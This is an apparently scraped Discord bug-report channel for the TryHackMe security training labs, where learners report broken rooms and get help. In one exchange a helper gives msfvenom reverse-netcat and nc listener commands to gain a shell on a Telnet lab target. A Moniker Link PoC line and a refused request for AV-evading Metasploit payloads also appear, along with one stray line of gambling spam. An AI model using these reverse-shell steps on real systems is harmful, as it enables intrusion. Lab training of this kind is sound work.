#room-bugs
1 messages Β· Page 10 of 1
srly.. I've tried include but required include/ .... thank you
why it's asking for that dir?
Just a random question π . Demonstrates how verbose error messages can pose a vulnverability π
ok thank you @spare mirage π
Gave +1 Rep to @spare mirage (current: #19 - 451)
I am so sorry, now that i am seeing the message, yeah i have completed the room. Thanks a lot for helping me.βΊοΈ
Gave +1 Rep to @spare mirage (current: #19 - 452)
in metasploit exploitation room they ask to find passwd by bruteforce with given uname 'penny' with smb_login modlue and i did that so with the given wordlist but they showing 0 credentials are matched
use this #room-help
i have set this correct;y
https://tryhackme.com/r/room/wiresharkthebasics
Please change the question "What is the e-tag value?" in task 3 to use ETag instead as this actually gives hits when googling. Thank you π
https://tryhackme.com/r/room/sqlinjectionlm somebody finished level four of this thing
Suggest posting this in #room-help first and if something isn't working (after having someone else smoke test or do a sanity check), then this is the correct channel. π
Hope someone could help me out. I'm just going over the room Moniker Link (CVE-2024-21413). I have followed the instructions and replaced the placeholder in PoC with the attacker machine IP address on the line "<p><a href="file://10.10.55.191/test!exploit">Click me</a></p>. Also replaced the other IP address that was in the instructions. From there I save and execute the script and all seems fine, but when I click the link on the victim machine I get message "We can't find /10.10.55.191/test!exploit". I have read other people's write ups and watched a video walkthrough and it doesn't appear I've missed anything.
I suspect a bug. I tried to restart a machine, the request doesn't work.
k tnxs
I think its the endpoint issue. Its not supposed to be exampleX but example1
I had the same problem, couldnt fix it
Did you test clicking on βOKβ and then looking at your responder?
I tried it too, nothing was showing on the responder, its definitely a bug
Yes, I've spent a few good amount of hours trying to figure out what is going wrong there. Like I mentioned, I tried seeking help in room-help, online write ups and video walkthroughs and different options but nothing seemed to be working. I was using AttackBox, not my own VM.
i dont know if this is a bug
however might as well mention it
so when i was cd .. out of a directory i was checking through previous commands as i often do when making notes
oh boy is there a whole bunch i never used on the cmd
Public Key Cryptography Basics
is what im on
even reboot the machine it persisted my guess
it doesnt reset between generation of the room and or a user and the current login
machine is crypto Basics v.0.3
just to prove it this is a new booted instance
added a little zip with a video showing with how many commands it allowed me to cycle through
before i terminated the machine i made a slowed down recording of all the commands visible to me
pls fix ur sandbox evasion room issue
https://tryhackme.com/r/room/owasptop102021
In OWASP top 10 room task 22, which is SSRF task, getting following error when starting server on attackbox
# nc -lvp 8000
nc: getnameinfo: Temporary failure in name resolution
One needs to add -n
-n: Numeric-only IP addresses, no DNS resolution.
Though in the walkthrough it mentions nc -lvp 80
anyone else having an issue with network services with the machine not starting and the ip being invalid?
Which task are you doibg?
i was trying to do task 3 with the enumerating SMB
And what is happening?
when i do the enum4linux -a and then the ip it says it cant find the workgroup/domain and that the server doesnt allow session
or does the ips only work with the attackbox's cuz ive been doing them in my own VM of Kali
Are you on the VPN?
nope
Then that's the issue.
To communicate to the THM network via VM, you need to be on the VPN to the tunnel is unlocked. π
use nc -lnvp 8000
@magic vale @wheat cargo I had the same problem yesterday and then today and asked for help in room-help. @spare mirage was kind enough to try to help me, but after nothing we tried worked, they tried the room and got the same error.
Damn so it really is a bug then
Unless we all made the same exact mistake (some of us maybe even ten times π ), it appears to be a π
hi:) it's quite very likely that the room/VM creator has just forgot to clear the bash history of when they were developing the machine
hi:) I have a slight feeling this is partly due to some upgrades on the AB recently. It sounds like responder isn't behaving correctly. I'll add it on my list to take a look at
Whatever it is or however we call it, I'm just glad it wasn't me π
π apologies for the insaity troubles. I have a pretty good idea of what's causing it. Will investigate and implement a fix asap next week
Yer itβs a new one so I thought Iβd mention so it gets cleared
in room "REMnux: Getting Started", in task 3 is little typo: "Using the virtual machine attached to task 2, the REMnux VM, navigate to the /home/ubuntu/Desktop/tasks/agenttesla/ directory. Our target file is named agenttelsa.xlsm. Run the command oledump.py agenttesla.xlsm. See the terminal below." The typo is in the filename agenttelsa.xlsm, should be agettesla.xlsm.
hey is there bug in the course tracking system
i finished the course but it shows only 33%
Since I know how much I don't know, when I can't get something to work, I assume it's something I did (or didn't do) and in most cases, it's either that or a bit of research is required. So when even the fifth attempt at this room didn't work, my impostor syndrome had a field day πΆ
However, when the issue gets resolved, I'll print this out to my kids as a proof that it's not always my fault, so I cannot really be unhappy with the whole situation π
might be if there are multiple versions of the room and the old version you got to 1/3rd done and then you completed the updated version
other then that no clue
thanks let us wait for the staff maybe they have a solution, I have OCD concerning courses tracking lol
Hi
So on tryhackme some rooms tell you to start a machine so you can get an IP so you can search for that IP and get a website and from there you can solve the room
my problem is the page isn't loading
i need help
ive been trying to solve it for 5 hours now
will just casually ping @stiff tundra and hope they can refer to the content team
Which machine?
the one that gives out the IP
Yeah,. I meant which room specifically, as there is over 900
thank you ^^
Gave +1 Rep to @rugged canyon (current: #3 - 1958)
This problem occurs on every room that requires me to use the IP to search for a web page
but currently i am on
OWASP Top 10 - 2021
@quaint sparrow they cross posted in tons of channels... from what it looks like in site support it could be country blocked vpn
could be
except that it works fine on other networks from the same ISP
jordan apparently goes back and forth on blocking things though
Are you using the ports?
ya
but i just tried it π’
still works on the other network
explain that to me , what do you mean
Which country are you in?
i am like 80% sure it has something to do with my network config
i just have no clue how to fix it
jordan
Jordan blocks VPN's, you'll need to use the attackbox
hhhhh
yes sir sorry to bother you
Is it a known bug for the Pre Security path that you can't get you your achievement for this path because you get stuck at 95% complete due to "Linux fundamentals part 3" being incomplete even though I have a 100% in the room?
I started about a week ago and didn't have a problem with the Pre-Sec track.
Room : https://tryhackme.com/r/room/windowsforensics1
Outdated link in task5 : "AccessData's Registry Viewer " is not https://accessdata.com/product-download/registry-viewer-2-0-0 anymore, new link is https://www.exterro.com/ftk-product-downloads/registry-viewer-2-0-0
Dunno if outdated link are considered a bug but this channel seemed the best place to report it.
Hello i complete all module of Linux Fundamentals 2 but appears as i only did 14% of it But i finish it as possible to see in the image
crack the hash - "aReallyHardSalt" -- when in split view mode, the end of the hash is not visible. missing the last 2 characters of the hash. could not side scroll to see if more was there and when selecting the whole line to copy, it still missed the last 2 characters. led to lots of bangin my face into my keyboard before i realised i was missing a part of the hash when i went fullscreen
can anyone help im placeing correct answer and it says that its faklse
Post in #room-help
At least it doesn't seem like you are the only one
#room-bugs message
Hi, i'm trying the room BurpSuite Basics
In the challange it indicate the site http://MACHINE_IP.
I tried with localhost but it doesn't works
In some video, i looked that there is a specific ip
Is it a room bug?
You need to start the machine . Press on the green start machine button . After that machine_ip placeholder will change to value of the actual IP
π
I had started and was inside the machine but nothing had changed
I will now try again by also refreshing the page
That's AttackBox you're refering to probably π
Yes
Machine that you're attacking and AttackBox aren't the same thing π . To start the machine you will need to press green Start Machine button in one of Taska after that you will get the actual IP π
It's Task 10 - Site Map and Issue Definitions. There is no Start Machine button
This is the room
Can you verify please?
You need to start the machine in Task 9 π
Ok! Thank you very much!
SOC Level 1 -> https://tryhackme.com/r/room/yara, Task 6, there is link to Cuckoo Sandbox (link from Task 6: https://cuckoosandbox.org/). The proper link should be: https://cuckoosandbox.org/index.html. The main page directs to some ad site without link to the tool.
TryHackMe is a free online platform for learning cyber security, using hands-on exercises and labs, all through your browser!
ν ν μ¬μ΄νΈμμλ μΆκ΅¬, κ²½λ§, ν λμ€, ν¬λ¦¬μΌ λ± νλμ μ€ν¬μΈ λ² ν μμ₯μ λ² ν ν μ μμ΅λλ€. νλ¨μμλ νλ μ΄μ΄μκ² μΆμ²νλ νλ«νΌ 10 κ³³μ μκ°ν©λλ€
Automated Malware Analysis β Cuckoo Sandbox Home About Download [β¦]
Hello Everyone, I'm Currently in the room Linux Fundamentals Part 1. My machine is not showing up or displaying. It's just blank. I tried clearing cache and tried restarting. Nothing helped. https://tryhackme.com/r/room/linuxfundamentalspart1
Can you provide a screenshot of what's going on π ?
Hey I'm trying to connect to phillip in the Active Directory Basics Room. I can't run successfully the PS command. Why is that i did everything in that room correctly. Anyone knows?
And now instance termination so i can't add screenshot.
it's true. You need to try through vpn.
I had the same problem)
Hi all, i'm unable to join this room. tried in different browsers.
can anyone pls help.
You need a 7 day streak π
but, the room required 0 streak only. i can see that. i'm unable to share the screenshot here.
This one π ?
Are you a premium user ?
no.
Than you must have a 7 day strak to enter this network π
I don't know how , but you must have a 7 day streak to enter this network π
i tried in different browser too
okey thanks for your support.
Gave +1 Rep to @spare mirage (current: #15 - 545)
Hello friends!
I hope you are all well!
I'm new to TryHack, I'm trying to do the first task, and I'm giving the correct answer and the website is showing it as incorrect...
Can you help me?
Which room , which task π ?
IntroduΓ§Γ£o Γ SeguranΓ§a
Qual das seguintes opΓ§Γ΅es representa melhor o processo em que vocΓͺ simula as aΓ§Γ΅es de um hacker para encontrar vulnerabilidades em um sistema?
SeguranΓ§a Ofensiva
SeguranΓ§a Defensiva
Answer must be in English
Offensive security π
Glad to hear that π , be aware that all answers must be in English π . Keep going bro π
Anyone has a tip for me? It might be a database issue, My Web Application Pentesting says 100%, but a submodul shows 88% so I can't save my cert π¦
If I click into that submodul, it shows 100%, so nothing I can do on my side.
Hello, all. I am not sure but I am not getting access of the VM's in Networking module by using "tryhackme" password. As per my knowledge the password is same accross the VM's for SSH right?
Working on this https://tryhackme.com/r/room/networkingconcepts
Hi folks, I'm currently working on a task 7 in the room of Network Services, Exploiting Telnet. I'm not sure if it's a bug or misunderstanding but when I make a telnet connection through the AttackBox, it responds with the commands like .HELP and .EXIT but doesn't respond to .RUN ping [local THM ip] -c 1. I tried to solve it by asking ChatGPT but I couldn't find the solution for the problem. I tried to close it and reconnect it but didn't change. I'll appreciate your help.
Could you provide a screenshot π ?
It's not the same password for all machines . You only need to use telnet in this room , password isn't requiered for that π
I wanted to send the image but couldn't, so I send it as text (Is there a reason why I can't send images?)
root@ip-10-10-198-67:~# telnet 10.10.187.232 8012
Trying 10.10.187.232...
Connected to 10.10.187.232.
Escape character is '^]'.
SKIDY'S BACKDOOR. Type .HELP to view commands
.HELP
.HELP: View commands
.RUN <command>: Execute commands
.EXIT: Exit
.RUN ping 10.10.198.67 -c 1
You need to verify before sending screenshot
@low jungle
Try to use .RUN ls π
.RUN <command-that-you-want-to-run>
IDS fundamentals task 1 links to a room that does not exist.
Telnet room is by far the hardest for beginners lol
What's the problem π ?
Same as him but for me, that skidy's backroom banner doesn't show up
I don't know if It is a bug or I haven't really deep dived to find the answer, been stuck here for hours π
Ohhhh I found KGB's answers similar questions to my problem here on discord, I'll try that
What causes the problem buddy π ?
Already solved by your previous answer:
Glad to hear that , you're doing great , keep going buddy π
Intro to IaC. I am stuck here. Jetpack dude just keeps on jetpacking but deals or received no damage. I have 2 anti-air weapons and tried to increase the range.
Which task π ?
The last. The game is always the last.
Also deploying the weapons is sometimes done only beclicking slightly below the box/circle and cloud/on-remise or configuration upgrades don't feel impactful.
Tbh I also don't like these kind of games π . Can you tell me how you're provisioning resources π ?
And In which level you lose π ?
2 AA and 2 Land Guns, rest goes into configuration, level 3. I snatched the flag off google search
Some of these games are quite good. I'd argue they need to leave more time to answer questions. Not everyone speaks English as well and some might think slow, but they are good in principle, just need better testing.
Are you set infrastracture as on-premise ?
I think I went cloud. on that level. the advantage of on premise was supposed ot be I can deploy weapons anywhere, but that wasn't happening, I still was limited bu those boxes.
But I dont know.
Try to use on-premise and also try to allocate a little bit more points to provisioning instead of configuration π
But what else would I provisiou, I can only have two weapons covering the attack vectors?
I also had the game window totally black out in lvl 2 on the first attempt.
i copied the date and pasted it, it still says wrong answer
they confirmed there was no extra whitespace chars before and after the answer too
@grizzled kettle Thank you:)
Gave +1 Rep to @last loom (current: #79 - 90)
Refresh the page and copy this || 5/3/2021 ||
2 spaces
I tried it but still doesn't respond...
"""
root@ip-10-10-48-125:~# telnet 10.10.22.141 8012
Trying 10.10.22.141...
Connected to 10.10.22.141.
Escape character is '^]'.
SKIDY'S BACKDOOR. Type .HELP to view commands
.RUN ls
.RUN ls
.RUN whoami
.RUN whoami
"""
Could you provide a screenahot please π ?
Does || .RUN pwd || return anything ?
I'm trying to verify the account. I'll show you the image once it gets done.
At this moment nothing has been returned.
Check this resource if you're having trouble π
The TryHackMe Discord Server
Thank you, now I can show you the image.
Gave +1 Rep to @spare mirage (current: #15 - 561)
Well that's strange π . Start a listener on your AttackBox and see if it catches anything when you run that ping command π
|| sudo tcpdump ip proto \icmp -i ens5 ||
can you try typing it in manually???
Was this answer copy/pasted?
Its done with 2 spaces
So 05/03
Nah nah 2 spaces
Started a tcpdump listener and tried the ping command once again...
Ok that's what was expected , we proved that we can reach back to our machine π
Now let's create a payload π
Let's use msfvenom π
|| msfvenom -p cmd/unix/reverse_netcat lhost=<YOUR-IP> lport=4444 R ||
It will give you the command that you need to run on the telnet instance of the vulnerable machine to initiate a connection back to your machine π .
On your machine start a listener to catch a connection π || nc -lvnp 4444 ||
I'm using port 4444 as i am used to it , but you can use any open port above 1024
So for now telnet doesn't suppose to respond?
there I got the payload
Now start listener
|| nc -lvnp 4444 ||
On your AttackBox π
When you start listener run the command that you got as an output on telnet service || .RUN <your-command> || π
You should receive a shell π
It worked and I was able to get the content of flag.txt π Thank you so much for your help.
Gave +1 Rep to @spare mirage (current: #15 - 565)
I found a bug, which automatically attaches my cursor to the correct answer in this room:"https://tryhackme[.]com/r/room/networkingsecureprotocols"
I'm having alot of issues with permissions in these "beginner" rooms.
Had first issues with telnet not letting me connect, same with tcp.
tryhackme com/r/room/tcpdump - now I am in this room, and start an machine and i'm getting:
tcpdump: ens5: You don't have permission to capture on that device
(socket: Operation not permitted)

I can get past the rooms by just googling all answers but idk xdd
Googled myself throug the entire room now x))))))))))))))
No clue if this is the right room for this, but I am working through the Basic Static Analysis room for a college course. When I got to task 5, I wanted to terminate and restart my machine because of an error I made in answering the questions. However, I got this error message, and the expiry timer has now run out, and the machine still will not terminate (therefore meaning I can't start it again). I tried using the REMOTE TRYHACKME dialog with the provided credentials, but it did not work. Does anyone know how to fix this?
Other machines (such as the Basic Dynamic Analysis room's) terminate just fine, and I have already tried logging out and restarting my computer.
Hi All,
Sorry to bother, really enjoying the content so far.
I am upto task 8 in the 'intro to Cross-site scripting' room.
It asks me to go to the website from the attackbox (https://ipaddress.p.thmlabs.com)
When I try to access this I get what looks like a possible cert error?
The cert looks to be within date so I'm not sure how to proceed, or if it's just me.
When going to advanced then 'accept the risks and continue' <(this button is greyed out btw)
it has a think for a while and then goes to a 504 gateway time-out screen.
Please help!
To confirm, have you clicked on the green Start Machine button? Also, are you a subscriber?
Which box are you trying to connect to exactly?
Try to restart your browser π
.
on the complete beginner path when im entering the first room (https://tryhackme.com/r/room/tutorial) the site loads and immediately blanks when im logged in. when im not logged in the site loads normaly tested on firefox, chromium and safari with addons disabled. does anyone else have the same problem?
Works fine for me , but it seems that a lot of users are reporting this same issue π .
Not even restarting my computer works
Changing browsers also does nothing
try and run this script
#site-support message
Which area do I paste it into?
press f12 and then console
I tried running both v1 and v2 (in both Brave and Google Chrome). These are the error messages I got from Brave. I believe the issue is the Bad Gateway for https://tryhackme.com/api/v2/vms/terminate (as v1 had a not defined token). I now see the same 502 error when trying to terminate the machine normally.
interesting, it'll die by itself later I guess
Well, it's been about 20 hours since I first ran into the issue
So the expire timer has been sitting at 0m 0s for a while
i want to hack nasa
We can't teach you that here I'm afraid :)
so bro atleast telll me, how to make a metasploit payload undecetatable in windows 11 so that it can bypass all the sucking red alerts
help me bro
just write and send me the script of the code
please bro
help me teach
me
That sounds unethical and against our community rules π
This channel is also for bug reporting π
hellp me
teach em
i want it ethically bro
just tell me the metasplot commands and code which i have to enter
i am a scripty kiddy
brah brah
We cannot help you here I'm afraid.
But, if you want to learn how to use metasploit, we have plenty of resources on the website: https://tryhackme.com
Why don't you try it out? π
I am the community manager π
Hello, the room tutorial is not working, i copy/paste the IP address in the firefox url bar but I get a 405 error. It bugs me because when i click on resume path, i keep landing there because it wasn't validated.
https://tryhackme.com/r/room/tutorial
I posted this in support / room-help too
so can you tell me the code which i have to write to make my metasploit payload undetectable in msfvenom???????????????
please brah
brah brah please brah
It sounds like you're accessing the AttackBox IP address not the room's IP address.
#room-help please make sure you're only posting in one channel as per our server rules π
bro
Alright, thanks, and sorry
Gave +1 Rep to @hazy tiger (current: #5 - 1367)
Which network is this? The network itself seems to need a reset before the cert push
Its AD - Persisting Active Directory
Which subnet? Are you able to request a reset for the subnet?
Hello, I can't launch Caldera in the caldera room from SOC2 is this a known problem?
That rooms takes really long to boot-up π . 15min or more . Be patient π
seems to be venv problem, I get some modulenotfounderror even after installing manually requirement.txt
(it's on the AttackBox machine not caldera victim machine)
Hey! Currently I am doing the room "CI/CD and Build Security".
Task 4 specifies to install "php7.2-cli", this is initially not possible on the attackbox.
It should be listed (or pre-installed) that you have to install:
sudo apt install software-properties-common
add-apt-repository ppa:ondrej/php
Turns out upgrading the attackboxes to Ubuntu20.04 also breaks the runner.
The following command should be executed to make the runner work:
sudo rm /home/gitlab-runner/.bash_logout
Hi, I'm currently doing the "BurpSuite Basics" room, and am having trouble with task 10 as the "foxy proxy" doesn't seem to want to allow traffic through, I have ensured that the port and IP are identical to those laid out in the room but still no luck. Additionally BurpSuite is running
Do you have intercept running?
Are you doing this on a virtual machine?
Are you forwarding the requests in Burp?
Turn the Intercept to off π
Hello room-bugs, just curious is there is a way I can make something like a pull request to update the "task text" (for lack of a better term) on the site?
I'm sure a lack of information is intentional at times (perhaps more than I suspect) but I'm running into some issues that I'm solving with reddit posts in the "Upload Vulnerabilities" room, which is on the "Complete Beginner" path, and I'm not sure if instructions are, let's say missing, or intentionally left out.
I don't think that is possible at the moment. Updates to rooms would depend on who created it in the first place. If it is a community made one, only the room creator can update it or if it is a THM Staff created one, then you can make suggestions here and THM Staff would look at it when they get a chance.
If you have any questions though, just put those in #room-help and folks would gladly help out.
This has been addressed before, and this won't be made open source.
What are you expecting?
Appreciate the responses info and scurbz.
Scrubz, my expectation was to (on some rooms immediately, but others eventually) help contribute to current and future learning on the site.
hello, my capstone challenge is not working
First, i can't generate pass list if im using hashcat or john with new rules and then second, when i use hydra it's showing that there is no password found but when i checked the walktrough the correct password are in there. Then i just used the credentials with evolution and it won't login.
Hello, how can I fix that? I try to import and pip install but it still doesn't work:)
@spare mirage
i'm having this same issue
Apologies I was out. I have attempted this again and am now no longer getting the same error. Thanks very much for looking into this.
Gave +1 Rep to @unborn pulsar (current: #11 - 718)
Sorry for late response π¦ . Which room and which task is this ?
my answer in a room is correct but it's saying it's a wrong answer, any help?
Which room and what's your answer π ?
It's not tryhackme's error or exercise, but I'm having problems with my code.
how website works is the room and for the last question
What's your answer π ?
Try to ask here https://discord.com/channels/521382216299839518/785620917073608704 π
HTML_INJ3CTION
Refresh the web page and copy this || HTML_INJ3CTI0N || π
thanks it worked!π
PROGRAMMING????
Hello, in Room "Introduction to SIEM" / Task 2 => What is an "imglogs" ? => typo error ?
Which question ?
Hello, Room Moniker Link (CVE-2024-21413) / Task 3 requires Responder -I ens5, but you get a bunch of "check permissions or other servers running" and no response. Running from root.
There seems to be a temporary problem with that room π
tnx, found it through searching!
Will a fix be anounced somewhere?
Try to change interface to eth0 , maybe that will help π¦
eth0 isn't an active network device on the VM.
Further: Room Metasploit: Exploitation Task 5 expects that Target Machine is vulnerable to EternalBlue. The issue: It isn't.
Introduction to honeypots, task 6, first question "What CPU does the honeypot "use"?" and the hint is to "Try reading /proc/cpuinfo". In that file the model name is "Intel(R) Xeon(R) CPU E5-2686 v4 @ 2.30 GHz", but it's incorrect, the "correct" answer is "Intel(R) Core(TM) i9-11900KB CPU @ 3.30GHz". Is the answer hard-coded into the question? π
Could you provide a room link π ?
You probably started the wrong machine . Terminate machine from Task 2 and start one in Task 5 π . They are two different machines π
Ooh lol
Sorry
Maybe a good thing to point out a little more clear? I spent quite the time trying to poke hole into it.
Don't get me wrong, I had fun doing it.
Whenever you see multiple machines icons along with the Task heading it means that this Task has different machine π . Task 6 also has a different machine π
The issue is that "start machine" is grayed out when you have one going. But sure, I'll know now. Its just extra VM power for them.
Yeah , you will need to terminate the previous instance π
I know, I'm just saying that it gives you the impression that you allready have the machine running.
Seems like you're reading file from AttackBox instead of target machine π
I am reading from target machine
The machine i'm on RN is very buggy. Had to turn on and of twice and the command only works like 1/3 times on the VM and never through VPN.
Metasploit Exploitation
Task 5.
I wouldn't mind doing the whole thing on the VM but its sooo slow.
Probably temporary congestion due to higher traffic because AoC π
does that affect thm?
It shouldn't matter for specific exploits for example no? Like the same exploit works 1/6 times with the same settings all 6 times.
I'm really starting to question if it was a good idea to buy a whole year. Two out of two rooms bugged for me today for two different reasons.
Ethernal Blue is very unstable exploit . It's higher chance that it will crash the machine than it will succeed π
Could you provide a screenshot please π ?
Ah, very good to know.
In the introductions to Linux room there are two inconsistencies. First one is the echo question where it requires that the answer is without quotation mark even though both return the same result. Second one is the question about how many folders are present where it expects the answer 4 but the actual number is 5 since .cache is a directory. Would have attached screenshots from running commands but lacking permission to upload images to channel.
from room-help / trying to understand if it is a bug:
hi guys, im doing room "Windows Internals" and the machine is giving me different results then the correct answers
[19:44]
on task 2 it asks me for:
What is the process ID of "notepad.exe"?
the correct answer is 5984
but on the machine is 4848
and im using procmon
[19:45]
even on task manager shows 4848 for the pid
[19:46]
it also asks:
What is the integrity level of the process?
correct answer: high
but procmon says: medium
Rather than telling user that 5 folders are wrong I would probably award them for being inventive or taking the extra step
I cannot attach a screenshot here directly
This would be very good to know as well, so that people don't assume that they're doing something wrong and give up.
I really don't see a point of using an exploit that works 1/10 times, even without mentioning it, to teach people the entry level way of using exploits. I think it's just buggy, no other reason.
https://imgur.com/vYWpO5J Verbose mode.
This is what happens with Blue, the type of exploit it is.
So 1. Why chose it as the first exploit people use and 2. why not mentioning it making people belive that they are doing something wrong. It just doesn't make any sense. Just increases the load on their own IT infra for no reason.
- because it's probably, if not the top, one of the most well known exploit.
- Ha;f the time it fails, is because people use their own VM and don't set the LHOST to tun0.
In which case this is a fault on the user.
- It's a really lousy reason for using at best a semi-functional exploit which also seems to depend on having a steady line which they don't seem able to provide. You can just tell people about it and either set up the VM so that it's way more likely to work or just simply pick another exploit which has a higher success rate.
- Which also isn't something included anywhere. You're just supposed to know these very specific for TryHackMe fixes with limited use in the real world.
I've been pressing "run" for about an hour now with tun0 active, zero success. I'm having so much fun, so happy I payed a bunch of money for this.
Or you know what, use it but tell people that they're not likely succeding the first 10 times.
What's your target ip?
10.10.120.36
I was able to connect once on the very slow Attackbox which I didn't want to stay in because each command took like five minutes.
But that was on a different ip.
You may need a new ip.
I've dealt with maybe five or six.
But sure, lets try another one.
If you have any power on the site, please remove the waiting time or at least reduce it when loading machines for paying customers. If people abuse it, just block new creations for a little time.
I have none, and the waiting time is standard, you're booting up a VM after all.
Fair enough
Same thing with the new IP, 10.10.128.89.
Stuck on "Triggering free of corrupted buffer."
Can you verify and share a screenshot.
Pinged you in the subs-room-help @quaint sparrow
In the Complete Beginner path, I cannot access the very first Tutorial page. I have moved on to the lessons in the path, but, I cannot complete the Complete Beginner path because I am stuck at the Tutorial page.
To reproduce the problem:
- Make sure you are logged out.
- Go to https://tryhackme.com/r/room/tutorial
- You will see the page.
- Then Login.
- Now, the page will become blank.
The same thing happens on:
- Windows: Edge, Chrome
- Ubuntu: Firefox, Chrome.
Can the Customer Support solve this problem? I am frustrated with this because I have subscribed to THM and I cannot complete the path because of this path. If it can happen to this path, may be I will encounter the same issue in future lesson.
Works fine for me π¦
Switch to root user π
Then try to read the file π
i have a problem with connecting to webmail's rdp on capstone challenge. I can connect to vpn with the same credentials but not to pc.
I'm in windows fundamentals 1, getting an error while trying to access the machine
Which error π ?
Hi! I am trying to do Advent of Cyber day 1, the machine is running, but I get an βuser does not have access to that roomβ error when I try to open the Attack boxβ¦ any ideas what the issue might be, please?
Does it just mean itβs too busy atm?
@dusky junco Is this able to be resolved?
Hey everyone, I am a new cyber learner on https://tryhackme.com/r/room/enumerationbruteforce. I have been trying to get through task 4 and 5 but it seems like Burp Suite is not capturing the request as it should according to walkthrough. Can anyone help me please?\
Uhhh, I have a machine stuck running (I was working on https://tryhackme.com/room/incidentresponseprocess ~24h ago), and I can't kill it??
(Could it be that I used the machine's shutdown command and borked the state?)
Check ur foxyproxy configuration
Same issue for me! Was working on AoC2024 day 1 and now it's just stuck there.
Not exactly a bug, but https://tryhackme.com/r/room/bashscripting might need a once over on the ol' QA
If you're reporting issues with a room, can you please tell the team which issues.
I'll write em up tomorrow sorry lads
I found an extremely unimportant typo in a room - in Red Team Fundamentals, in the View Site activity on page 6. Reporting and Analysis. Exercise is spelt "excercise". A very unimportant nitpick, but I thought I'd shoot it over here anyway 
Typos are not bugs (usually)
Typos should still be submitted in here.
In turn, the typo could cause a bug.
Seemed like the channel that matched best 
Fair enough
HI:) thanks. I've created a ticket internally to get this resolved π
In Wireshark: The basics; in Task 4 it asks me to to "export packet bytes" by right-clicking a jpeg section after i looked at packet 12. But i dont get the correct options. I have no option that says export anything.
This only happens if I use the attackbox in the task. If i use wireshark on my PC it shows up like it should. Did i mess something up or why is this?
If anyone can help i would appreciate it.
Has anyone reported issues within the Red Team OpSec room? I cant seem to view the numbers or proper sequence in the site
Can you share the room?
Yes. https://tryhackme.com/r/room/opsec Task 7.
Yo, when I'm trying to access the link they gave me in the 2 task of the Christmas event it just says "Error gateway 502" and it just doesnt load. What should I do?
This?
If there is a legit bug, not feature. Can I haz swag? Lol π πΎ
Yes, the instructions and hint request ordering a number sequence
I dont see the numbers specified
Ugh, i knew it. Ok, so ill try again
thank you, i was dragging on top of exisiting categories
π It's ok.
This is what happens when you stay up late for #1305926862114914325 and #1312113121040535656 without coffee
Yo, when I'm trying to access the link they gave me in the 2 task of the Christmas event it just says "Error gateway 502" and it just doesn't load. What should I do?
Hello! I am unable to access frostypinesresort.thm even if I type in the IP address directly into the browser anyone know why ?
Add it to your host File?
I already did it and nothing the web page just hangs up and It doesn't load up
hey were you able to figure that out? have someone with the same question
i just typed http:// frostypines.thm and it loaded up but extremely slow(Might just be me) so I needed to watch the video to be able to complete the questions
hello! Can someone please help me with the second day's room? How do I answer the second and third questions?
Try to ask here https://discord.com/channels/521382216299839518/1305926862114914325 π
I can't download task files on room https://tryhackme.com/module/defensive-security-tooling. Keeps giving me error 500.
hey team, the AD module is bugged
the topology is not showing
red teaming path
picture provided by @novel carbon after I asked for help
link for the room is https://tryhackme.com/r/room/breachingad
issue experienced by 3 users
and it is actually for all of the AD rooms
hello guys I'm in the Splunk basics room. When I try to download the task files I get this error: 500
Something went wrong!
I can't provide screenshots
Room OWASP Top 10 - 2021 - Task 21 - Unable to download task files. I get the 500 Bugs screen.
ohh me too
I wonder if it's site-wide problem with downloads of Task files.
probably yes
Probably server side prob π¦
You will need to verify to upload screenshots π
The TryHackMe Discord Server
TY I'm verified now
Gave +1 Rep to @spare mirage (current: #9 - 827)
Thanks, we are working on this. π
Gave +1 Rep to @wraith creek (current: #659 - 7)
Thanks, also working on it. π
Hi, is it known that the room CI/CD and Build Security is having dns problems?
Within step 6 it does not want to connect to netcat when running the shell via the Jenkinsfile.
It does connect to the http.server.
I am using the CI/CD subnet as attack IP within the Jenkinsfile and shell script
Looks like it's working now π I was able to download the files in Task 21 of https://tryhackme.com/r/room/owasptop102021
That phrase is not consistent
Room: Shells Overview; Task: Reverse Shell
yea, should be fixed now. Thanks for verifiying!
Gave +1 Rep to @spare scroll (current: #2428 - 1)
Should be fixed now. Let me know if you still see any issue.
thank you, all good indeed
Gave +1 Rep to @wraith obsidian (current: #967 - 4)
Is this a private room where you uploaded your own VM or public?
It's ok, they multi posted, this needs a cache/cookie clear with a refresh.
WARNING: AOC2024 day4 task 1 flag-spoiler in mp4
I got a small bug with notepad in todays AOC room. It seemed like it was open "off-screen". thought i would post it here, managed to move it to my fov with windows+leftarrow. Could also have used preview pane or terminal to view the contents of the file so it is not a super impactful bug,
Try to use machine in full-screen mode . Press the leftmost icon to open it π .
the attackbox isn't responding when I click convert https://cdn.discordapp.com/attachments/1216776724663111680/1314255846166757427/image.png?ex=67531ba3&is=6751ca23&hm=69ce127ffe477ea869932fe5f47f45a1b63b9518ed27135108cb82853fd6f849&
Are you sure that you started the right machine π ?
I clicked start attackbox at the top of the page
That's attackBox but each Task has a different machine are you sure that you started the right one π ?
Hello,
I'm encountering an issue while trying to access the internal network through the VPN via BreachingAD room. Specifically:
I'm unable to resolve or access http://printer.za.tryhackme.com and similar subdomains (ntlmauth.za.tryhackme.com, thmdc.za.tryhackme.com).
My /etc/resolv.conf is configured with nameserver 10.200.55.201 and search za.tryhackme.com.
The VPN is connected successfully, and I can ping the servers (e.g., 10.200.55.101 responds to pings), but services like HTTP appear filtered or unreachable (e.g., port 80 is filtered).
DNS resolution fails intermittently, and tools like nslookup sometimes return SERVFAIL.
A traceroute to 10.200.55.101 doesn't show hops beyond the VPN gateway.
I've verified that there are no local firewalls or restrictions on my end. Could you please investigate or provide guidance?
Thanks in advance for your assistance!
check the pinned posts in the #breaching-ad
Hello, I am having an issue in the AoC day 5 room. The browser within Burp Suite is not connecting to the site. Thank you in advance for any help!
Turn Interceptor to off π
Go to Proxy tab > Set Intercept feature to off π
Hello.. I am having a problem at https://tryhackme.com/r/room/exploitingad
The THMWRK1 is down. All the other are ok.
βββ(rootγΏkali)-[~]
ββ# ping thmwrk1.za.tryhackme.loc
PING thmwrk1.za.tryhackme.loc (10.200.60.248) 56(84) bytes of data.
^C
--- thmwrk1.za.tryhackme.loc ping statistics ---
5 packets transmitted, 0 received, 100% packet loss, time 4081ms
βββ(rootγΏkali)-[~]
ββ# ping 10.200.60.248
PING 10.200.60.248 (10.200.60.248) 56(84) bytes of data.
^C
--- 10.200.60.248 ping statistics ---
7 packets transmitted, 0 received, 100% packet loss, time 6183ms
βββ(rootγΏkali)-[~]
ββ# ping thmserver1.za.tryhackme.loc
PING thmserver1.za.tryhackme.loc (10.200.60.201) 56(84) bytes of data.
